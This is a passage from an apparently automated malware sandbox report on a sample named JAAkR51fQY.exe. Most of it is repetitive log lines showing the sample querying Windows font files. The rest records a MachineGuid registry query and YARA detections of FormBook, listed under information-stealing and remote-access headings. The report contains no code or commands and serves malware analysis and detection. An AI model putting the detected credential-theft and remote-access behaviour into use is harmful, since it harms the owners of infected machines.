            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LEELAWAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LEELAWDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MSUIGHUB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\WINGDNG3.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TEMPSITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PAPYRUS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ITCKRIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\JUICE___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRSCRIPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRADHITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\OUTLOOK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GARAIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GARABD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOTHIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOTHICI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOTHICBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BELLB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRLNSR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRLNSDB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BERNHC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_PSTC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRITANIC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BROADW.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BRUSHSCI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALIFR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALIFI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CHILLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\COOPBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FTLTLT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\HARLOWSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\HARNGTON.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\HTOWERTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LBRITE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LBRITEI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LBRITEDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LCALLIG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\OLDENGL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ONYX.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PARCHM.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PLAYBILL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\RAVIE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\INFROMAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SNAP____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\STENCIL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\VIVALDII.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\VLADIMIR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCM_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCMI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCB_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCBI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCCM____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCCB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SCRIPTBL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCKEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ROCCB___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\RAGE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PERTILI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PERTIBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PERI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PERBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\PALSCRI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\OCRAEXT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MAIAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LTYPE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LTYPEO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LTYPEB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LTYPEBO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LSANS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\LSANSDI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\HATTEN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOUDYSTO.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOUDOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOUDOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GOUDOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GIL_____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GILI____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GILB____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GILBI___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GILC____.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
            Source: C:\Users\user\Desktop\JAAkR51fQY.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

            Stealing of Sensitive Information:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Remote Access Functionality:

            barindex
            Yara detected FormBookShow sources
            Source: Yara matchFile source: 0000000A.00000002.585911893.0000000000A90000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.268975653.0000000000400000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.587186497.0000000002BE0000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269629188.0000000005610000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 0000000A.00000002.583664848.0000000000700000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.269603953.00000000055E0000.00000040.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000000.00000002.230538128.000000000446C000.00000004.00000001.sdmp, type: MEMORY
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 4.2.vbc.exe.400000.0.raw.unpack, type: UNPACKEDPE

            Mitre Att&ck Matrix

            Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
